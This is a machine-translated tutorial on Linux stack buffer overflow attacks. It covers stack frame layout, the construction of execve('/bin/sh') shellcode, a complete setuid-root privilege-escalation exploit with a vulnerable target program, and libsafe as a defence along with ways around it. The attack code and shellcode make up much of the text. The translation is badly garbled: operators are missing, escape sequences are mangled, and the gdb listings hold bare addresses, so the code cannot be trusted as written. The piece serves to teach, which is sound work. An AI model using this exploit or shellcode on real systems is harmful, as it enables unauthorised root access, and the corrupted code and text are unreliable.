Foreword
The stack of logically processes is made of a plurality of stack frames, where each stack frame corresponds to a function call. When the function call occurs, the new stack frame is pressed into the stack; when the function returns, the corresponding stack frame is popped up from the stack. Although the introduction of the stack frame structure provides direct hardware support to implement function or process in advanced languages, since important data such as the function returns the address in the stack visible in the programmer, it is also given to the system seat belt. It has a great hidden danger.
The most famous buffer attack in history may be an attack code carried by Morris Worm on November 2, 1988. This Internet worm exploits the Fingerd program buffer overflow vulnerability, which brings great harm to users. Thereafter, more and more buffer overflow vulnerabilities are discovered. From Bind, WU-FTPD, Telnetd, Apache, etc., the applications provided by software vendors such as Microsoft, Oracle seem to always make up the buffer overflow vulnerability.
According to the vulnerability report provided by the Green Alliance, 1830 of the various operating systems and applications were found in 2002, including 432 buffers overflow vulnerabilities, accounting for 23.6% of the total. And the 2002 budget of the Green Alliance In the top ten security vulnerabilities in the maximum impact, there are 6 in the buffer overflow.
A little need to be explained before the reader read this article, the compilation operation environment of all sample programs in the text is GCC 2.7.2.3 and Bash 1.14.7, if the reader doesn't know what the compilation runtime you can use by the following command:
$ GCC -V
Reading Specs from /usr/lib/gcc-lib/i386-redhat-linux/2.7.2.3/specs
GCC Version 2.7.2.3
$ rpm -qf / bin / sh
BASH-1.14.7-16
If the reader uses a higher version of GCC or Bash, the results of the sample programs in the run will not match the results given here, and the specific reasons will be explained in the respective chapters.
LINUX buffer overflow attack instance
In order to cause readers' interest, we may wish to first look at the buffer overflow attack instance under Linux.
#include
#include
Extern char ** environ
INT main (int Argc, char ** argv)
{
Char large_string [128];
Long * long_ptr = (long *) Large_String;
INT I;
Char shellcode [] =
"// Xeb // x1f // x76 // x08 // x31 // x07 // x89 // x46 // x0c // xb0 // x0b"
"// x89 // x4e // x08 // x8d // x56 // x0c // xdb // x89 // xd8 // x40 // xcd"
"// x80 // xe8 // xdc // xff // xff // XFF / bin / sh";
For (i = 0; i <32; i )
* (long_ptr i) = (int) Strtoul (Argv [2], NULL, 16);
For (i = 0; i <(int) strlen (shellcode); i )
Large_string [i] = shellcode [i];
Stenv ("Kirika", Large_String, 1);
Execle (Argv [1], Argv [1], NULL, ENVIRON);
Return 0;
}
Figure 1 Attack Program EXE.C
#include
INT main (int Argc, char ** argv)
{
Char buffer [96];
Printf ("-% p - // n", & buffer;
STRCPY (Buffer, Getenv ("Kirika");
Return 0;
}
Figure 2 Attack Object Toto.c
Compile the above two programs to the executable, and change Toto to the host to the ROOT SETUID program:
$ GCC EXE.C -O EXE
$ gcc Toto.c -o Toto
$ SU
PASSWORD:
# chown root.root Toto
# chmod s Toto
# ls -l EXE TOTO
-RWXR-XR-X 1 WY OS 11871 Sep 28 20:20 EXE *
-RWSR-SR-x 1 root root 11269 Sep 28 20:20 Toto *
# exit
OK, look at what will happen next. First don't forget to verify our current identity with the whoami command. In fact, Linux inherits a habit of UNIX, that is, the ordinary user's command prompt is starting with $, and the superuser command prompt is starting with #.
$ WHOAMI
WY
$ ./exe ./toto 0xbffffffff
- 0xBffffc38 -
Segmentation Fault
$ ./exe ./toto 0xbffffc38
- 0xBffffc38 -
Bash #whoami
root
Bash #
The first time it is generally not successful, but we can accurately know the system's vulnerability --0xbffffc38, the second time you will be killed. When we execute the whoami command again under the newly created shell, our identity is already root! Since the highest goal of hacker attack under all UNIX systems is the pursuit of root privileges, so it can be said that the system has been broken.
Here we simulate a typical case of a Linux buffer overflow attack. Toto's home owner is root, and has a setuid property, usually this program is a typical attack target of buffer overflow. Ordinary User WY has launched a buffer overflow attack to a programs that contain malicious attack code, and the system's root permission is obtained. One thing to explain is that if the reader uses a higher version of Bash, even if the attack EXE is brought by the buffer, you get a new shell, you may find your permissions after seeing the result of the whoami command. For details, we will explain in a detailed explanation in the last section of this article. However, in order to seek as fast, you can first use the EX_PRO.C in this document package as an attack program, not the exe.c in Figure 1.
Layout and stack frame structure of process address space under Linux
To understand the principle of Linux down buffer overflow attacks, we must first grasp the layout of Linux processes under Linux and the structure of the stack frame.
Any program usually includes code segments and data segments, which are static. The program must be running, first of all, the operating system is responsible for creating a process for it, and establishing a mapping for its code segments and data segments in the virtual address space of the process. The light code segment and data segment are not enough. The process also has its dynamic environment during operation, where the most important thing is the stack. Figure 3 shows the address space layout of processes under Linux:
Figure 3 Layout of Process Address Space Under Linux
First, Execve (2) is responsible for establishing mappings for process code segments and data segments, truly reading memory in the code segment and data segments is done by the system's pages anomaly handler. In addition, Execve (2) will clear the BSS segment, which is why the global variables that are not assigned and the start value of the Static variable is zero. The highest position of the process user space is used to store the command line parameters and environment variables at runtime, and there is a large void below the lower part of this address space, and there is a large void as the process of the process. Stacks and piles are habitally, where the stack is stretched down and stretched up. I know the position of the stack in the process address space, let's take a look at what is stored in the stack. I believe that the reader is already very familiar with the concept of functions in the C language. In fact, the stack is stored in the stack frame corresponding to each function. When the function call occurs, the new stack frame is pressed into the stack; when the function returns, the corresponding stack frame is popped up from the stack. A typical stack frame structure is shown in Figure 4.
The top of the stack frame is a function of the function, the following is the return address of the function and a pointer to the previous stack frame, and the bottom is the space assigned to the partial variable used. A stack frame typically has two pointers, one of which is called a stack frame pointer, and the other is called a stack top pointer. The position pointed to by the former is fixed, and the position indicated by the latter is variable during the operation of the function. Therefore, it is a base address when accessing the arguments and local variables in a function, plus an offset. As can be seen in Figure 4, the offset of the arguments is the offset of positive and local variables.
Figure 4 Typical stack frame structure
Introduced the structure of the stack frame, let's take a look at how the stack frame is implemented on the Intel I386 architecture. Figures 5 and 6 are a simple C procedure and a compiler generated after compilation.
Int Function (int A, int B, int C)
{
Char buffer [14];
Int sum;
SUM = a b C;
Return SUM;
}
void main ()
{
INT I;
i = function (1, 2, 3);
}
Figure 5 A simple C program eXample1.c
1 .file "example1.c"
2 .version "01.01"
3 GCC2_Compiled .:
4.text
5.align 4
6.globl function
7.Type function, @ function
8 function:
9 pushl% EBP
10 MOVL% ESP,% EBP
11 SUBL $ 20,% ESP
12 MOVL 8 (% EBP),% EAX
13 AddL 12 (% EBP),% EAX
14 MOVL 16 (% EBP),% EDX
15 AddL% EAX,% EDX
16 MOVL% EDX, -20 (% EBP)
17 MOVL -20 (% EBP),% EAX
18 jmp .l1
19.align 4
20.l1:
21 Leave
22 RET
23.lfe1:
24.size function, .lfe1-function
25.align 4
26 .Globl main
27.Type main, @ function
28 main:
29 pushl% EBP
30 MOVL% ESP,% EBP
31 SUBL $ 4,% ESP
32 Pushl $ 3
33 Pushl $ 2
34 Pushl $ 1
35 Call Function
36 Add1 $ 12,% ESP37 MOVL% EAX,% EAX
38 MOVL% EAX, -4 (% EBP)
39.l2:
40 Leave
41 RET
42.lfe2:
43.size main, .lfe2-main
44.Ident "GCC: (GNU) 2.7.2.3"
Figure 6 EXAMPLE1.C Compilation EXAMPLE1.S generated after compiled
Here we focus on the formation and destruction of the stack frame corresponding to the function function. As can be seen from Figure 5, the function is called in main, and the values of the three arguments are 1, 2, 3, respectively. Since the function passage in the C language follows the reverse stack order, three arrows are pressed into the stack from the right to left in FIG. 6. Next, the CALL instruction of the 35 line is pressed into the stack of the address of the next command addL of the CALL in addition to the control transfer to function. Let's go to the FUNCTION function, first saved the main function of the main function in the stack in the 9th line and saved the current stack top pointer EBP in the stack frame pointer EBP in the 10th line, and finally in the 11th behavioral function function. Local variables Buffer [14] and SUM allocate space in the stack. At this point, the stack frame of the function function is built, and the structure is shown in Figure 7.
Figure 7 Function of Function Frame
The reader may wish to go back to compare with Figure 4. There are a few things to do here. First, under the Intel i386 architecture, the role of the stack frame pointer is played by EBP, and the role of the top pointer is played by the ESP. In addition, the local variable of function function is composed of 14 characters, and the size is 14 bytes, but 16 bytes are assigned in the stack frame. This is a compromise between time efficiency and spatial efficiency because Intel i386 is a 32-bit processor. Each of the memory access must be 4 bytes, and the high 30-bit address is the same as 4 bytes. A machine word constitutes. Therefore, if the SUM is allocated in two different machine characters to fill the two bytes left by Buffer [14], then each access SUM requires two memory operations, which is obviously unacceptable. It is also necessary to explain that, as we pointed out in this paper, if the reader uses a higher version of GCC, the stack frame corresponding to the function function you see may differ from Figure 7. . It has been told above, and the partial variable of function function buffer [14] and SUM allocated space in the stack is done by subtocation operation of ESP in Figure 6, and 20 in the SUB instruction is here. The storage space required for local variables. However, in a higher version of GCC, the numbers that appear in the SUB instruction may not be 20, but a larger number. It should be said that this is related to optimizing compilation techniques. In the higher version of GCC, in order to effectively use the current popular optimization compilation techniques, you usually need to leave a certain additional space in the stack frame of each function.
Let's take another look at how the function function will give A, B, C to SUM. As mentioned earlier, it is a base address in the function in the function, plus an offset, and the stack frame pointer under the Intel i386 architecture is EBP. For the sake of clear, we The offset of all ingredients in the stack frame relative to the stack frame pointer EBP is labeled in FIG. The calculation of 12 to 16 in Fig. 6 is at a glance, 8 (% EBP), 12 (% EBP), 16 (% EBP) and -20 (% EBP) are solid parameters A, B, C, and local variables, respectively. Sum address, several simple add instructions and MOV instructions are executed in SUM, and the sum of the three of A, B, C. In addition, the return result of the function in the assembler generated by the GCC is passed through EAX, and thus the value of SUM is copied into the EAX through EAX. Finally, let's take a look at how the function function is executed and the stack frame corresponding to its corresponding stack is popped up. The Leave instruction of the 21st line of Figure 6 copies the stack frame pointer EBP to the ESP, so that the space allocated in the stack frame is allocated by the local variable buffer [14] and the SUM is released; in addition, the Leave instruction also has One function is to pop up a machine word from the stack and store it into the EBP, so that EBP is restored to the stack frame pointer of the main function. The RET instruction of line 22 is again popped up from the stack and stores it into the instruction pointer EIP, so that the control returns to the AddL instruction in the 36th line main function. The AddL instruction adds a stack top pointer ESP to 12, and the stack space occupied by the three arguments that press the function function before the initial call function is released. At this point, the stack frame of the function function is completely destroyed. The front is just mentioned that the returning result of the EAX transfer function is passed in the assembler generated by the GCC, so the return result of the function function is stored in the local variable I of the main function.
Linux under the principle of buffer overflow attack
Understand the layout of Linux processes and the structure of the stack frame, let's look at an interesting example.
1 int function (int A, int b, int c) {
2 char buffer [14];
3 int sum;
4 int * Ret;
5
6 RET = Buffer 20;
7 (* RET) = 10;
8 sum = a b c;
9 returnium;
10}
11
12 void main () {
13 int x;
14
15 x = 0;
16 function (1, 2, 3);
17 x = 1;
18 Printf ("% d // n", x);
19}
Figure 8 A wonderful program example2.c
In the main function, the initial value of the local variable X is first assigned to 0, and then calls a function function with an unrelated amount of X, and finally, the value of X is changed to 1 and print it. How much is the result, if I tell you 0, do you believe it? Gossip less, or hurry to see where functions are moving. The FUNCTION function here is only a plurality of pointer variables RETs and two statements that operate in FIG. 5, that is, they make the result of the MAIN function to become 0. As can be seen in Figure 7, the address buffer 20 is saved is the return address of the function function, and the statement of the line 7 adds 10 Return addresses of the function function. What effect will this be achieved? Look at the compiler of the main function.
$ GDB EXAMPLE2
(GDB) Disassemble Main
Dump of assembler code for function main: 0x804832c
0x804832D
0x804832f
0x8048332
0x8048339
0x804833B
0x804833d
0x804833f
0x8048344
0x8048347
0x804834e
0x8048351
0x8048352
0x8048357
0x804835C
0x804835f
0x8048360
0x8048361
End of assembler dump.
Figure 9 Compilation program corresponding to the main function in eXample2.c
The CALL directive of the address is 0x804833F will press the 0x8048344 to press the stack as the return address of the function function, and the action of the seventh line statement in Figure 8 is to add 10 × 8048344 to turn into 0x804834E. This will be skipped as a MOV command that is 0x8048347 when the function function is returned, and the role of this MOV instruction is used to change the value of X. Since the value of X has not changed, the result we print is inevitably 0.
Of course, Figure 8 is only an exemplary program, and we change the normal control flow of the program by modifying the return address saved in the stack frame. The operation results of the program in Figure 8 may make many readers feel novel, but if the return address of the function is modified to point to a carefully arranged malicious code, what do you do? The buffer overflow attack is using the returning address of the function under certain architecture, which is saved in the stack in the programmer, modify the return address of the function, so that a carefully arranged malicious code can be returned when the function returns. Execute the purpose of hazard system security.
Speaking that the buffer overflows can not mention shellcode, shellcode readers have seen in Figure 1, and their role is to generate a shell. Let's take a step by step to see how this dazzling program is. First, you must explain that system calls under Linux are implemented through int $ 0x80. The system call number is saved in EAX before calling int $ 0x80, and the parameters called by the system are saved in other registers. Figure 10 shows the Hello WORLD program implemented directly using the system call. #include
Int errno;
_SysCall3 (int, Write, Int, FD, Char *, DATA, INT, LEN);
_syscall1 (int, exit, int, status);
_Start ()
{
Write (0, "Hello World! /// N", 13);
exit (0);
}
Figure 10 Direct Using System Calling Hello World Programs Hello.c
Compile its link to generate an executable Hello:
$ GCC -C Hello.c
$ ld hello.o -o hello
$ ./hello
Hello World!
$ ls -l hello
-RWXR-XR-X 1 WY OS 1188 Sep 29 17:31 Hello *
Interested readers can compare this Hello size and we have compared the size of the Hello World program in the first C language class, see if you can write smaller Hello World programs with C language. The _syscall3 and _syscall1 in Figure 10 are all macros defined in /usr/include/ASM/Unistd.h, which defines the corresponding system call numbers and the corresponding system call numbers that are called in __nr_. _syscall0 to _syscall6 six macros, which are used for system calls for parameters 0 to 6. This, it is understood that the maximum number of parameters allowed in the Linux system is 6, such as MMAP (2). Also, read the definition of Syscall0 to _SysCall6 six macros. It is not difficult to find that the system call number is stored in the register EAX, and the six parameters that the system call may be stored in the register EBX, ECX, EDX, ESI In EDI and EBP.
Clear the rules of the system call, let me see how to generate a shell under Linux. It should be said that this is a very simple task, using the execve (2) system call, as shown in Figure 11.
#include
int main ()
{
Char * name [2];
Name [0] = "/ bin / sh";
Name [1] = NULL;
Execve (Name [0], Name, NULL);
_exit (0);
}
Figure 11 shellcode.c generated a shell under Linux
In shellcode.c, two system calls were used in shellcode.c, which were execve (2) and _exit (2). View /usr/include/asm/Unistd.h file can be seen, with its corresponding system call number __nr_execve and __nr_exit are 11 and 1, respectively. According to the previous system call rules, generate a shell under Linux and end the extraction of the following steps:
Store a string "/ bin / sh" ended with '// 0'; saves the address of the string "/ bin / sh" in a machine word in the memory, and the back is next value. The machine word of 0, which is equivalent to setting two pointers in Name [2] in Figure 11; loads the system call number 11 of Execve (2) into the EAX register; "/ bin / sh" The address is loaded into the EBX register; the address of the address "/ bin / sh" set "/ bin / sh" in step 2 is loaded into the ECX register; put the address of the machine characterized in step 2 to the 10-step address Register; execute int $ 0x80, which is equivalent to calling execve (2); load _exit (2) system call number 1 into the EAX register; load an exit code 0 into an EBX register; execute int $ 0x80, here is equivalent to call _exit (2). So we got the assembler shown in Figure 12.
1 void main ()
2 {
3 __asm __ ("
4 JMP 1F
5 2: POPL% ESI
6 MOVL% ESI, 0x8 (% ESI)
7 MOVB $ 0x0,0x7 (% ESI)
8 MOVL $ 0x0,0xc (% ESI)
9 MOVL $ 0XB,% EAX
10 MOVL% ESI,% EBX
11 LEAL 0x8 (% ESI),% ECX
12 LEAL 0XC (% ESI),% EDX
13 INT $ 0x80
14 MOVL $ 0x1,% EAX
15 MOVL $ 0x0,% EBX
16 INT $ 0x80
17 1: Call 2B
18.String // "/ bin / sh //"
19 ");
20}
Figure 12 uses Execve (2) and _exit (2) system call to generate a assembler shellcodeasm.c
The JMP instructions of the fourth line here and the 17th line of Call instructions are used by the relative addressing of IP. The 14th lines to 16th line correspond to the _exit (2) system call, because it is relatively simple, we look at it Call the process of Execve (2). First, the JMP instruction of the fourth line is executed, and the control is transferred to the CALL instruction of the 17th line, and the address of the next instruction is used in the execution of the CALL instruction to the POP instruction to the 5th line. Press the stack. As can be seen from Fig. 12, there is no subsequent instruction behind the CALL instruction, but stores the string "/ bin / sh", so that the actual pressing stack is the address of the string "/ bin / sh". The POP instructions of the 5th line will first press the string address of the stack to pop up into the ESI register. The next three instructions first save the string address in the ESI in the machine word after the string "/ bin / sh", and then add a '// 0' at the end of the string "/ bin / sh". Finally, 0 is written to the appropriate location in memory. Chain 9 to 12th lines The values of registers EAX, EBX, ECX, and EDX are properly set, and Execve (2) can be called in line 13. But after compiling shellcodeasm.c, you will find that the program cannot run. The reason is that all the data shown in Figure 13 is stored in the code segment, and the page of the code in Linux is not writable, so we tried to write operation using the MOV command in Figure 12, The page exception handler sends a SIGSEGV signal to the process running our program so that the prompt information of the Segmentation Fault will appear on our terminal.
Figure 13 When calling Execve (2), the settings of each register is simple. Since we cannot write to the code segment, we move the code in Fig. 12 in the writable data segment or stack segment. But how should an executable code say how should the data segment? In fact, the bits of 0 and 1 in memory are stored. When our programs use it as code as code, these bits become code when our programs are used as data as data. . Let's first look at how the code in Figure 12 is stored in memory. This is easy to do with the x command in GDB, as shown in Figure 14.
$ GDB shellcodeasm
(GDB) Disassemble Main
Dump of assembler code for function main:
0x80482c4
0x80482c5
0x80482c7
0x80482c9
0x80482ca
0x80482cd
0x80482d1
0x80482d8
0x80482DD
0x80482df
0x80482e2
0x80482e5
0x80482e7
0x80482ec
0x80482f1
0x80482f3
0x80482f8
0x80482f9
0x80482FC
0x80482fd
0x80482ff
0x8048301
0x8048302
End of assembler dump.
(GDB) x / 49xb 0x80482c7
0x80482c7
0x80482cf
0x80482df
0x80482e7
0x80482ef
0x80482f7
Figure 14 Views the data corresponding to the code in the memory via the x command in GDB
From the beginning address of the JMP instruction 0x80482c7 to the end address of the CALL instruction 0x80482f8, a total of 49 bytes. The start address is actually stored in the 8-byte memory cells of 0x80482f8. Therefore, we have seen several strange instructions there. At this point, our shellcode has already taken shape, but there are several need to improve. First, we will copy the above code to a memory buffer through Strcpy (3), and strcpy (3) is when the content is '// 0'. Will stop copying. However, it can be seen from Figure 14 that there is a lot of such '// 0' bytes in our code, so they need to be removed. In addition, certain instructions can be reduced to make our shellcode more streamlined. According to the improvements listed in Figure 15, we got the final shellcode in Figure 16.
Directive for instructions in the problem
MOVB $ 0x0,0x7 (% esi) xorl% Eax,% EAX
Molv $ 0x0,0xc (% ESI) MOVB% EAX, 0x7 (% ESI)
MOVL% EAX, 0xc (% ESI)
MOVL $ 0XB,% EAX MOVB $ 0XB,% Al
MOVL $ 0x1,% EAX XORL% EBX,% EBX
MOVL $ 0x0,% EBX MOVL% EBX,% EAX
INC% EAX
Figure 15 Advanced Program of Shellcode
void main ()
{
__ASM __ ("
JMP 1F
2: POPL% ESI
MOVL% ESI, 0x8 (% ESI)
XORL% EAX,% EAX
MOVB% EAX, 0x7 (% ESI)
MOVL% EAX, 0xC (% ESI)
MOVB $ 0XB,% Al
MOVL% ESI,% EBX
LEAL 0x8 (% ESI),% ECX
LEAL 0xC (% ESI),% EDX
INT $ 0x80
XORL% EBX,% EBX
MOVL% EBX,% EAX
INC% EAX
INT $ 0x80
1: Call 2b
.string // "/ bin / sh //"
");
}
Figure 16 Final shellcode assembler shellcodeasm2.c
Similarly, the shellcode code in the memory is again viewed in the above method, as shown in Figure 16. We will listen out the shellcode used by Figure 1 in Figure 16, and interested readers may wish to compare.
$ GDB shellcodeasm2
(GDB) Disassemble Main
Dump of assembler code for function main: 0x80482c4
0x80482c5
0x80482c7
0x80482c9
0x80482ca
0x80482cd
0x80482cf
0x80482d2
0x80482d5
0x80482d7
0x80482d9
0x80482dc
0x80482df
0x80482e1
0x80482e3
0x80482e5
0x80482e6
0x80482e8
0x80482ed
0x80482ee
0x80482f1
0x80482f2
0x80482f4
0x80482f6
0x80482f7
End of assembler dump.
(GDB) X / 38XB 0x80482C7
0x80482c7
0x80482cf
0x80482d7
0x80482DF
0x80482e7
Char shellcode [] = "// Xeb // x1f // x5e // x89 // x76 // x08 // x31 // xc0 // x88 // x46 // x07 // x89 // x46 // x0c // XB0 // X0B "
"// x89 // x4e // x08 // x8d // x56 // x0c // xdb // x89 // xd8 // x40 // xcd"
"// x80 // xe8 // xdc // xff // xff // XFF / bin / sh";
Figure 17 SHELLCODE origin
I guess that when you see this here, I must be like I have been boiling, I can't wait? Then come and try it.
Char shellcode [] =
"// Xeb // x1f // x76 // x08 // x31 // x07 // x89 // x46 // x0c // xb0 // x0b"
"// x89 // x4e // x08 // x8d // x56 // x0c // xdb // x89 // xd8 // x40 // xcd"
"// x80 // xe8 // xdc // xff // xff // XFF / bin / sh";
void main ()
{
INT * RET;
RET = (int *) & ret 2;
(* RET) = (int) shellcode;
}
Figure 18 Verify our shellcode via the program testsc.c
Compile Testsc.c into an executable program, you can see the shell again to run Testsc!
$ GCC Testsc.c -o testsc
$ ./testsc
Bash $
Figure 19 depicts everything made by the testsc.c program. I believe that there is a long pavement in front, and the reader should have not difficulty in seeing Figure 19.
Figure 19 Process of the program testsc.c
Below we should look back to see the LINUX buffer overflow attack instance at the beginning of this article. The attack program exe.c utilizes a program TOTO.C with a vulnerability in the system, and a buffer overflow attack is launched to the system by the following steps:
By command line parameter argv [2] get the address of the buffer buffer [96] in the TOTO.C program, and the address is filled in Large_String [128]; copied us of Shellcode to Large_String [128] The environment variable Kirika is injected into buffer [96]; when the main function in the TOTO.C program returns, the shellcode in Buffer [96] is running; because the TOTO is the ROOT, and has setuid Attribute, so we get the shell with root privileges.
The control flow of the program exe.c is very similar to the control process of the program Testsc.c shown in Figure 19. The only difference is that this time our shellcode is hosted in the stack at TOTO runtime, not in the data segment. The reason why shellcode is not placed in a data segment because when we call exec (3) running TOTO in program exe.c, the mapping of the entire address space is reset according to the description of the TOTO program header, and the original The content of the data segment in the address space can no longer access, so shellcode is passed through environment variables in programs exe.c.
How is it, is it that the legendary hacker is no longer mysterious as you think? Don't conclusion, in the above buffer overflow attack instance, the reason why the attack program EXE can accurately use Shellcode to TOTO's buffer [96], the key is that we print buffer in the TOTO program [96] The starting address in the stack. Of course, in the actual system, don't expect things like TOTO to have a scar. Defense Buffer Defense Buffer Spill Attack under Linux
Understand the principle of buffer overflow attacks, it is obvious that it is obviously to find out the way. Here, we mainly introduce a very simple but more popular way - Libsafe.
There is a lot of functions like Strcpy (3) in the standard C library, which copies a string to another string. For when the copy is stopped, these functions usually have only one judgment criteria, that is, if the '// 0' character is encountered. However, this only standard is obviously not enough. We have just analyzed the Under the previous section, the discharge attack instance is using Strcpy (3) to implement an attack on the system, and the defect of Strcpy (3) is that the size of the destination string is not available when copying the string. This factor is considered. There are still many functions like this, such as strcat, gets, scanf, sprintf, and more. Statistics show that the perpetrators are mostly these functions in the buffer overflow attack cases. It is based on the above facts, and the Avaya Lab has introduced libsafe.
In the current Linux system, most of the program links are dynamic link libraries. The dynamic link library itself has many advantages. For example, after the library upgrade, the original programs in the system do not need to recompile and do not need to re-link, you can use the upgrade dynamic link library to continue running. In addition, Linux also provides a lot of flexible means for the use of dynamic link libraries, and the preload mechanism is one of them. Under Linux, the preloading mechanism is provided by the settings of the environment variable ld_preeload. Simply, if there are multiple different dynamic link libraries in the system implement the same function, then prioritize the dynamic link library set in the environment variable ld_preeload during the link. In this way, we can use the preload mechanism provided by Linux to replace the functions of the security risks mentioned above, while libsafe is based on this idea.
The testlibsafe.c shown in Fig. 20 is a very simple program, and the string buf2 [16] is first written with 'A', and then copies it to the buf1 [8] via Strcpy (3). Since BUF2 [16] is larger than buf1 [8], it is clear that the buffer overflow will occur, and it is easy to think that since 'a' binary representation is 0x41, the return address of the main function is changed to 0x41414141. This will happen when the main returns.
#include
void main ()
{
Char BUF1 [8];
Char buf2 [16];
INT I;
For (i = 0; i <16; i)
BUF2 [I] = 'a';
STRCPY (BUF1, BUF2);
}
Figure 20 Test Libsafe
$ GCC Testlibsafe.c -o Testlibsafe
$ ./testlibsafe
Segmentation Fault (Core Dumped)
Let's take a look at how libsafe protects us from the buffer overflow attack. First, the Libsafe is installed in the system, and its version 2.0 installation package is provided in the attachment of this article.
$ SU
PASSWORD:
# rpm -ivh libsafe-2.0-2.i386.rpmlibsafe ############################################################################################################################################################################################################################################ #############
# exit
The installation is not over, and then set the environment variable LD_PRELOAD correctly.
$ export ld_preeload = / lib / libsafe.so.2
Let's try it below.
$ ./testlibsafe
Detected An Attempt To Write Across Stack Boundary.
Terminating / Home2 / Wy / Projects / Overflow / Bof / Testlibsafe.
UID = 1011 euid = 1011 pid = 9481
Call Stack:
0x40017721
0x4001780A
0x8048328
0x400429c6
Overflow caused by strcpy ()
It can be seen that libsafe correctly detects buffer overflow caused by strcpy () functions, its UID, EUID, and PID, and Call Stack at runtime are also listed. In addition, this information is not only displayed on the terminal, and it is also recorded in the system log, so the system administrator can master potential attack sources and prevent it in time.
So, can we have a low pillow? Don't have this innocent idea, in the computer security field invasion and anti-intrusion, never stop. In fact, Libsafe provides us with easy destruction. Since the implementation of libsafe depends on the preload mechanism provided by the Linux system as the dynamic link library, the program libsafe with buffer overflow vulnerabilities using the static link library is not powerful.
$ GCC -STATIC TESTLIBSAFE.C -O Testlibsafe_Static
$ ENV | GREP LD
LD_PRELOAD = / lib / libsafe.so.2
$ ./testlibsafe_static
Segmentation Fault (Core Dumped)
If you use the -static option when you use the GCC, you are using a static link library when linking. In the case where libsafe has installed Libsafe, you can see that the testlibsafe_static once again generated Segmentation Fault.
In addition, as we pointed out in this paper, if the reader uses a higher version of Bash, even if you get a new shell after running the attack program EXE, you may find that you have not got you. The expected root permission. In fact, this is one of the improvements in high version BASH. Since the buffer overflow attack in the past decade is not uncommon, most of the attack objects are the SETUID program in the system is the main root, in order to get root privileges. Therefore, the procedure in the ROOT-Running system is very dangerous. To this end, a system call called SeteUID (2) is added to the new POSIX.1 standard, which is the effect of changing the processive UID of the process. And the new version of Bash has also used this technology. At first, the Bash started to run the Bash's runtime, which appears in the high version. The results seen by run the attack program exe in Bash. So high versions of Bash have not been illegal? In fact, as long as you call SetUID (0) before you create a shell through Execve (2), the UID of the process is also changed to 0. This improvement in Bash will be unanimous. That is, what you have to do is to follow the system call rules that the previous system calls will be added to Shellcode, and this improvement in the new shellocde requires little workload. Shellcodeasm3.c and exe_pro.c in the attachment tell you how to do it. Conclude
There are two different forms of performance, one is if there is a vulnerability in the system, but the hackers don't know about it, then you can temporarily think that your system is safe; the other is Hackers and you have discovered security vulnerabilities in the system, but you will try to make a loophole to make your system really impeccable. Which one do you want? One sentence on the Bible gives this question's answer, and this sentence is also engraved on the walls of the US Central Intelligence Agency: "You should understand the truth, the truth will make you free."
references